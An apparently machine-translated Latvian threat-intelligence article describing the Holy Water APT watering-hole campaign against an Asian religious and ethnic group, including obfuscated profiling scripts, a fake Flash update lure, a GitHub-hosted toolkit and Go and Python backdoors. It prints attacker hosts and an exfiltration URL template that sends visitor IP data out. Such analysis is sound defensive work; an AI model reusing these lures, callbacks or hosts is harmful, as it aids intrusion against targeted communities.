Svētais ūdens APT

Holy Water APT ir nosaukums, kas dots kibernoziedznieku grupai, kas veica ūdens cauruma veida uzbrukumus Āzijas reliģiskajai un etniskajai grupai. Šī konkrētā uzbrukuma TTP (taktika, paņēmieni un procedūras) nevarēja saistīt ne ar vienu no jau zināmajiem ATP (Advanced Persistent Threat) dalībniekiem, kas lika pētniekiem secināt, ka šī ir jauna kibernoziedznieku grupa, kurai ir raksturīgas neliela un elastīga hakeru komanda.

Lai veiktu uzbrukumu ūdens caurumam, noziedznieki mērķē uz vairākām vietnēm, kuras bieži apmeklē norādītie mērķi. Vietnes var piederēt organizācijām, labdarības organizācijām vai ietekmīgām personām, kas pieder mērķa grupai. Visas Holy Water apdraudētās vietnes tika mitinātas vienā un tajā pašā serverī, un tajās cita starpā bija iekļauta reliģiska personība, labdarība, brīvprātīgā dienesta programma un godīgas tirdzniecības organizācija.

Uzbrukums ietvēra vairākus posmus

Apmeklējot apdraudētu vietni, lietotājs nonāk pirmajā uzbrukuma stadijā, kas sastāv no bojāta JavaScript ar nosaukumu (script|jquery)-css.js un aptumšota ar Sojson — Ķīnas tīmekļa pakalpojumu. Šī skripta uzdevums ir noteikt, vai lietotājs ir derīgs mērķis, un, lai to paveiktu, lietderīgā slodze sāk nokasīt datus par apmeklētāju un nosūtīt tos uz ārēju serveri loginwebmailnic.dynssl[.]com, izmantojot HTTP GET pieprasījumus:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Atbilde no servera atgriež patiesu vai nepatiesu rezultātu, un, ja vērtība ir patiesa, tiek aktivizēts nākamais uzbrukuma posms; pretējā gadījumā nekas nenotiek.

Otrajā darbībā JavaScript ar nosaukumu (script|jquery)-file.js, kas atkal tiek aizēnots tādā pašā veidā. Tomēr šoreiz hakeri v4 vietā izmantoja Sojson v5. Lai inficētu lietotāju, Holy Water APT neizmanto nekādas programmatūras ievainojamības vai vājās vietas. Tā vietā tiek ģenerēts uznirstošais logs, kurā tiek piedāvāts Flash atskaņotāja atjauninājums, un potenciālajam upurim ir jāpiekrīt faila lejupielādei.

Holy Water APT ļaunprātīgas programmatūras rīku arsenāls tika mitināts vietnē GitHub

Ja lietotājs atļauj turpināt viltus Flash atjauninājumu, tas izveido savienojumu ar vairs neaktīvu GitHub repozitoriju, kas atrodas vietnē github.com/AdobeFlash32/FlashUpdate . Šajā vietā tika glabāti četri dažādi rīku komplekti — instalēšanas pakotne, pētnieku Godlike12 nosauktā aizmugures durvju ļaunprogrammatūra un divas atvērtā pirmkoda Python aizmugures durvju versijas, kas pazīstamas kā Stitch un ko hakeri modificēja ar paplašinātu funkcionalitāti. Atjaunināšanas pakotne ir NSIS instalēšanas programma, kas atmet likumīgu Windows Flash Player instalēšanas programmu un pakāpenisku rīku, kas tiek izmantots faktiskās derīgās slodzes ielādei. Godlike12 aizmugures durvis ir rakstītas Go valodā un tiek izmantotas, lai ieviestu Google diska kanālu Command and Control (C&C, C2) serveros. Kas attiecas uz Stitch aizmugures durvju variantiem, papildus parastajām aizmugures durvīm, piemēram, informācijas un paroļu apkopošanai, aktivitāšu reģistrēšanai, failu lejupielādei utt., grupa Holy Water pievienoja iespēju lejupielādēt likumīgu Adobe Flash instalācijas programmu, lai veiktu automātisku atjaunināšanu. pati no ubntrooters.serveuser.com un panākt noturību, izmantojot ieplānotos uzdevumus.